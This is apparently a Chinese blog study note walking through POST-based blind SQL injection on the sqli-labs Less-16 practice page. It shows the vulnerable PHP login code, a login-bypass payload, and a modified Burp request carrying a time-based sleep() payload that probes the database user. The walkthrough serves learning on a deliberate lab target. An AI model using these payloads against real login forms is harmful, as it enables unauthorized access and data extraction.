SQL注入的强化学习耽搁了好久,这次终于能好好学习了
这次学习的是POST的盲注,关于POST的盲注,一般都要借助Burpsuite
POST /sql/Less-16/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-16/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
uname=1&passwd=1&submit=Submit
这是抓的一个POST包,我们看下页面的代码
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd']; $uname='"'.$uname.'"'; $passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { //echo '<font color= "#0000ff">'; echo "<br>"; echo '<font color= "#FFFF00" font size = 4>'; //echo " You Have successfully logged in " ; echo '<font size="3" color="#0000ff">'; echo "<br>"; //echo 'Your Login name:'. $row['username']; echo "<br>"; //echo 'Your Password:' .$row['password']; echo "<br>"; echo "</font>"; echo "<br>"; echo "<br>"; echo '<img src="../images/flag.jpg" />'; echo "</font>"; } else { echo '<font color= "#0000ff" font size="3">'; echo "</br>"; echo "</br>"; //echo "Try again looser"; //print_r(mysql_error()); echo "</br>"; echo "</br>"; echo "</br>"; echo '<img src="../images/slap.jpg" />'; echo "</font>"; } } ?>
注意一下红色的部分,用户输入只经过了两次转化,第一次加了双引号,第二次加了括号,而且SQL语句之前有个@,所以整个语句不会报错,再看看输出,只有两种输出方式,而且是图片,而且必须得正确,所以我们在不知道密码的情况下,得到的页面只会有一种
这样的话,我们基本就能确定:
基于时间的注入
实际上,这儿最简单的是构造万能密码
")or 1=1#
就能进去了,但是对于POST注入的练习我们是获取信息,那么该怎么办?
改包,改成这个样子
POST /sql/Less-16/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-16/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
uname=admin")or if(user()='root@localhost',sleep(2),null)#&passwd=1&submit=Submit
如果当前用户是root的话,返回时间就会延迟,那么借助之前的时注的文章,我们便能把信息一点点提取出来